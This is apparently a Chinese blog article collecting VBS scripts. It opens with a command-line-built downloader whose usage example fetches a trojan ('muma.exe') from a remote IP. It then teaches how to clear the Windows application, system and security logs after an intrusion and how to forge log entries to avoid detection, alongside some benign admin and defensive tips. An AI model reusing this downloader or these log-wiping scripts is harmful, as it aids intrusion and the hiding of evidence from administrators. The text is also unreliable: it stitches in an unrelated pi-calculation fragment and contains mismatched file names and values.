溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶(hù)服務(wù)條款》

有哪些經(jīng)典的vbs腳本

發(fā)布時(shí)間:2021-09-30 10:47:44 來(lái)源:億速云 閱讀:148 作者:iii 欄目:開(kāi)發(fā)技術(shù)

這篇文章主要講解了“有哪些經(jīng)典的vbs腳本”,文中的講解內(nèi)容簡(jiǎn)單清晰,易于學(xué)習(xí)與理解,下面請(qǐng)大家跟著小編的思路慢慢深入,一起來(lái)研究和學(xué)習(xí)“有哪些經(jīng)典的vbs腳本”吧!

1.文件下載(無(wú)回顯) 
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe 
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe 
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe 
echo xPost.Open "GET",iRemote,0 >>iget.vbe 
echo xPost.Send() >>iget.vbe 
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe 
echo sGet.Mode = 3 >>iget.vbe 
echo sGet.Type = 1 >>iget.vbe 
echo sGet.Open() >>iget.vbe 
echo sGet.Write(xPost.responseBody) >>iget.vbe 
echo sGet.SaveToFile iLocal,2 >>iget.vbe 

用法: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe 

2.列舉進(jìn)程 
@echo for each ps in getobject _ >ps.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs 
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs 

用法:cscript ps.vbs 

3.終止進(jìn)程 
@echo for each ps in getobject _ >pskill.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs 
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pskill.vbs 

用法:cscript pskill.vbs pid 

4.重啟系統(tǒng) 
@echo for each os in getobject _ >reboot.vbs 
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs 
@echo os.win32shutdown(2):next >>reboot.vbs 

用法:cscript reboot.vbs 

VBS腳本在系統(tǒng)安全中的八則巧妙應(yīng)用 
VBS腳本病毒的大量流行使我們對(duì)VBS的功能有了一個(gè)全新的認(rèn)識(shí),現(xiàn)在大家對(duì)它也開(kāi)始重視起來(lái)。VBS代碼在本地是通過(guò)Windows Script Host(WSH)解釋執(zhí)行的。VBS腳本的執(zhí)行離不開(kāi)WSH,WSH是微軟提供的一種基于32位Windows平臺(tái)的、與語(yǔ)言無(wú)關(guān)的腳本解釋機(jī)制,它使得腳本能夠直接在Windows桌面或命令提示符下運(yùn)行。利用WSH,用戶(hù)能夠操縱WSH對(duì)象、ActiveX對(duì)象、注冊(cè)表和文件系統(tǒng)。在Windows 2000下,還可用WSH來(lái)訪問(wèn)Windows NT活動(dòng)目錄服務(wù)。 
   
  用VBS編寫(xiě)的腳本程序在窗口界面是由wscript.exe文件解釋執(zhí)行的,在字符界面由cscript.exe文件解釋執(zhí)行。wscript.exe是一個(gè)腳本語(yǔ)言解釋器,正是它使得腳本可以被執(zhí)行,就象執(zhí)行批處理一樣。關(guān)于VBS大家一定比我熟悉多了,所以再不廢話,直接進(jìn)入主題,看看我總結(jié)的VBS在系統(tǒng)安全中的八則妙用吧。 
   
  一、給注冊(cè)表編輯器解鎖 
   
  用記事本編輯如下內(nèi)容: 
   
  DIM WSH 
  SET WSH=WSCRIPT.CreateObject("WSCRIPT.SHELL") '擊活WScript.Shell對(duì)象 
  WSH.POPUP("解鎖注冊(cè)表編輯器!") 
  '顯示彈出信息“解鎖注冊(cè)表編輯器!” 
  WSH.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion 
  \Policies\System\DisableRegistryTools",0,"REG_DWORD" 
  '給注冊(cè)表編輯器解鎖 
  WSH.POPUP("注冊(cè)表解鎖成功!") 
  '顯示彈出信息“注冊(cè)表解鎖成功!” 
  保存為以.vbs為擴(kuò)展名的文件,使用時(shí)雙擊即可。 
   
  二、關(guān)閉Win NT/2000的默認(rèn)共享 
   
  用記事本編輯如下內(nèi)容: 
   
  Dim WSHShell'定義變量 
  set WSHShell=CreateObject("WScript.shell") '創(chuàng)建一個(gè)能與操作系統(tǒng)溝通的對(duì)象WSHShell 
  Dim fso,dc 
  Set fso=CreateObject("Scripting.FileSystemObject")'創(chuàng)建文件系統(tǒng)對(duì)象 
  set dc=fso.Drives '獲取所有驅(qū)動(dòng)器盤(pán)符 
  For Each d in dc 
  Dim str 
  WSHShell.run("net share"&d.driveletter &"$ /delete")'關(guān)閉所有驅(qū)動(dòng)器的隱藏共享 
  next 
  WSHShell.run("net share admin$ /delete") 
  WSHShell.run("net share ipc$ /delete")'關(guān)閉admin$和ipc$管道共享 
   
  現(xiàn)在來(lái)測(cè)試一下,先打開(kāi)cmd.exe,輸入net share命令就可以看到自己機(jī)子上的共享。雙擊執(zhí)行stopshare.vbs后,會(huì)看見(jiàn)窗口一閃而過(guò)。然后再在cmd里輸入net share命令,這時(shí)候沒(méi)有發(fā)現(xiàn)共享列表了 
   
  三、顯示本機(jī)IP地址 
   
  有許多時(shí)候,我們需要知道本機(jī)的IP地址,使用各種軟件雖然可以辦到,但用VBS腳本也非常的方便。用記事本編輯如下內(nèi)容: 
   
  Dim WS 
  Set WS=CreateObject("MSWinsock.Winsock") 
  IPAddress=WS.LocalIP 
  MsgBox "Local IP=" & IPAddress 
   
  將上面的內(nèi)容保存為ShowIP.vbs,雙擊執(zhí)行即可得到本機(jī)IP地址。 
   
  四、利用腳本編程刪除日志 
   
  入侵系統(tǒng)成功后黑客做的第一件事便是清除日志,如果以圖形界面遠(yuǎn)程控制對(duì)方機(jī)器或是從終端登陸進(jìn)入,刪除日志不是一件困難的事,由于日志雖然也是作為一種服務(wù)運(yùn)行,但不同于http,ftp這樣的服務(wù),可以在命令行下先停止,再刪除,在命令行下用net stop eventlog是不能停止的,所以有人認(rèn)為在命令行下刪除日志是很困難的,實(shí)際上不是這樣,比方說(shuō)利用腳本編程中的VMI就可以刪除日志,而且非常的簡(jiǎn)單方便。源代碼如下: 
   
  strComputer= "." 
  Set objWMIService = GetObject("winmgmts:" _ 
  & "{impersonationLevel=impersonate,(Backup)}!\\" & _ 
  strComputer & "\root\cimv2") 
  dim mylogs(3) 
  mylogs(1)="application" 
  mylogs(2)="system" 
  mylogs(3)="security" 
  for Each logs in mylogs 
  Set colLogFiles=objWMIService.ExecQuery _ 
  ("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'") 
  For Each objLogfile in colLogFiles 
  objLogFile.ClearEventLog() 
  Next 
  next 
   
  將上面的代碼保存為cleanevent.vbs文件即可。在上面的代碼中,首先獲得object對(duì)象,然后利用其clearEventLog()方法刪除日志。建立一個(gè)數(shù)組,application,security,system,如果還有其他日志也可以加入數(shù)組。然后用一個(gè)for循環(huán),刪除數(shù)組中的每一個(gè)元素,即各個(gè)日志。 
   
  五、利用腳本偽造日志 
   
  刪除日志后,任何一個(gè)有頭腦的管理員面對(duì)空空的日志,馬上就會(huì)反應(yīng)過(guò)來(lái)被入侵了,所以一個(gè)聰明的黑客的學(xué)會(huì)如何偽造日志。利用腳本編程中的eventlog方法創(chuàng)造日志非常簡(jiǎn)單,請(qǐng)看下面的代碼: 
   
  set ws=wscript.createobject("Wscript.shell") 
  ws.logevent 0 ,"write log success" '創(chuàng)建一個(gè)成功執(zhí)行日志 
   
  將上面的代碼保存為createlog.vbs即可。這段代碼很容易理解,首先獲得wscript的一個(gè)shell對(duì)象,然后利用shell對(duì)象的logevent方法。logevent的用法:logevent eventtype,"description" [,remote system],其中eventtype為日志類(lèi)型,可以使用的參數(shù)如下:0代表成功執(zhí)行,1執(zhí)行出錯(cuò),2警告,4信息,8成功審計(jì),16故障審計(jì)。所以上面代碼中,把0改為1,2,4,8,16均可,引號(hào)中的內(nèi)容為日志描述。利用這種方法寫(xiě)的日志有一個(gè)缺點(diǎn),即只能寫(xiě)到應(yīng)用程序日志,而且日志來(lái)源只能為WSH,即Windows Scripting Host,所以不能起太多的隱蔽作用,在此僅供大家參考。 
   
  六、禁用開(kāi)始菜單選項(xiàng) 
   
  用記事本編輯如下內(nèi)容: 
   
  Dim ChangeStartMenu 
  Set ChangeStartMenu=WScript.CreateObject("WScript.Shell") 
  RegPath="HKCR\Software\Microsoft\Windows\CurrentVersion\Policies\" 
  Type_Name="REG_DWORD" 
  Key_Data=1 
   
  StartMenu_Run="NoRun" 
  StartMenu_Find="NoFind" 
  StartMenu_Close="NoClose" 
   
  Sub Change(Argument) 
  ChangeStartMenu.RegWrite RegPath&Argument,Key_Data,Type_Name 
  MsgBox("Success!") 
  End Sub 
   
  Call Change(StartMenu_Run) '禁用“開(kāi)始”菜單中的“運(yùn)行”功能 
  Call Change(StartMenu_Find) '禁用“開(kāi)始”菜單中的“查找”功能 
  Call Change(StartMenu_Close) '禁用“開(kāi)始”菜單中的“關(guān)閉系統(tǒng)”功能 
   
  將以上代碼保存為ChangeStartMenu.vbs文件,使用時(shí)雙擊即可。 
   
  七、執(zhí)行外部程序 
   
  用記事本編輯如下內(nèi)容: 
   
  DIM objShell 
  set objShell=wscript.createObject("wscript.shell") 
  iReturn=objShell.Run("cmd.exe /C set var=world", 1, TRUE) 
   
  保存為.vbs文件即可。在這段代碼中,我們首先設(shè)置了一個(gè)環(huán)境變量,其名為var,而值為world,用戶(hù)可以使用%Comspec%來(lái)代替cmd.exe,并且可以把命令:set var=world改成其它的命令,這樣就可以使它可以運(yùn)行任意的命令。 
   
  八、重新啟動(dòng)指定的IIS服務(wù) 
   
  用記事本編輯如下內(nèi)容: 
   
  Const ADS_SERVICE_STOPPED = 1 
  Set objComputer = GetObject("WinNT://MYCOMPUTER,computer") 
  Set objService = objComputer.GetObject("Service","MYSERVICE") 
  If (objService.Status = ADS_SERVICE_STOPPED) Then 
  objService.Start 
  End If 
   
  將它以startsvc.vbs為名保存在C盤(pán)根目錄。并通過(guò)如下命令執(zhí)行:cscript c:\startsvc.vbs。運(yùn)行后,經(jīng)你指定的IIS服務(wù)項(xiàng)將被重新開(kāi)啟。 
   
  最后,我們?cè)僬f(shuō)說(shuō)開(kāi)篇時(shí)提到的VBS腳本病毒的防范方法。VBS病毒的執(zhí)行離不開(kāi)WSH,在帶給人們便利的同時(shí),WSH也為病毒的傳播留下可乘之機(jī)。所以要想防范VBS病毒,可以選擇將WSH卸載,只要打開(kāi)控制面板,找到“添加/刪除程序”,點(diǎn)選“Windows安裝程序”,再鼠標(biāo)雙擊其中的“附件”一項(xiàng),然后再在打開(kāi)的窗口中將“Windows Scripting Host”一項(xiàng)的“√”去掉,然后連續(xù)點(diǎn)兩次“確定”就可以將WSH卸載?;蛘?,你也可以點(diǎn)擊“我的電腦”→“查看”→“文件夾選項(xiàng)”,在彈出的對(duì)話框中,點(diǎn)擊“文件類(lèi)型”,然后刪除VBS、VBE、JS、JSE文件后綴名與應(yīng)用程序的映射,都可以達(dá)到防范VBS腳本病毒的目的。 

當(dāng)最后一項(xiàng)的絕對(duì)值小于0.000001時(shí)停止計(jì)算。 

編寫(xiě)如下VBScript程序代碼: 

<HTML> 

<HEAD><TITLE>計(jì)算圓周率π</TITLE></HEAD> 

<BODY><H3>計(jì)算圓周率π</H3><HR> 

<INPUT TYPE="Button" NAME="Button1" VALUE="計(jì)算"> 

<SCRIPT FOR="Button1" EVENT="onClick" LANGUAGE="VBScript"> 

k = 1: s = 1: t = 1: m = 1 


圖3-12 計(jì)算圓周率 
While Abs(t) > 0.0000001 

k = k + 2 

m = -m 

t = m / k 

s = s + t 

Wend 

MsgBox "圓周率π=" & 4 * s 

</SCRIPT> 

</BODY> 

</HTML> 

執(zhí)行VBScript程序
注意:程序運(yùn)行時(shí)間可能很長(zhǎng)。 

感謝各位的閱讀,以上就是“有哪些經(jīng)典的vbs腳本”的內(nèi)容了,經(jīng)過(guò)本文的學(xué)習(xí)后,相信大家對(duì)有哪些經(jīng)典的vbs腳本這一問(wèn)題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

vbs
AI